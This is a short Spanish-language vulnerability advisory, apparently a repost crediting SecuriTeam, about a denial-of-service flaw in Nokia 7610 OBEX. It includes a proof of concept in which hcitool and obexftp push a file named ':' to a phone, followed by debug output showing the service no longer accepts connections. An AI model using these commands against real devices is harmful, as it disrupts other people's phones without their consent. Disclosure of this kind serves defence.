Un defecto en la implementacion de OBEX de Nokia 7610 y otros modelos, permite que los atacantes inhabiliten el servicio de OBEX enviando los archivos que contienen el nombre ": " o "\".
Sistemas Vulnerables:
* Nokia 7610, Nokia 3210
* implementacion de OBEX en Nokia 7610 (V4.0.437 15-09-04 RH51)
Prueba de Concepto:
jim:~# hcitool scan
Scanning ...
00:13:70:5E:1F:01 7610
jim:~# obexftp -b 00:13:70:5E:1F:01 -p \:
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT 1
cli_sync_request()
obexftp_sync()
client_done()
client_done() Found connection number: -1022384746
client_done() Sender identified
obexftp_sync() OBEX_HandleInput = 31
obexftp_sync() Done success=1
done
Sending ":"... obexftp_put_file() Sending : -> :
build_object_from_file() Lastmod = 2005-09-18T00:16:42Z
cli_sync_request()
cli_fillstream_from_file()
cli_fillstream_from_file() Read 6 bytes
cli_fillstream_from_file()
cli_fillstream_from_file() Read 0 bytes
obexftp_sync()
obexftp_sync() OBEX_HandleInput = 0
failed: :
obexftp_cli_disconnect()
Disconnecting...cli_sync_request()
failed: disconnect
obexftp_cli_close()
# Error pushing other file after send ":" filename:
jim:~# obexftp -b 00:13:70:5E:1F:01 -p /etc/hosts
Browsing 00:13:70:5E:1F:01 ...
Channel: 10
No custom transport
obexftp_cli_open()
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
obexftp_cli_connect_uuid()
Connecting...obexftp_cli_connect_uuid() BT -1
failed: connect
Still trying to connect
Fuente: SecuritiTeam
Salu2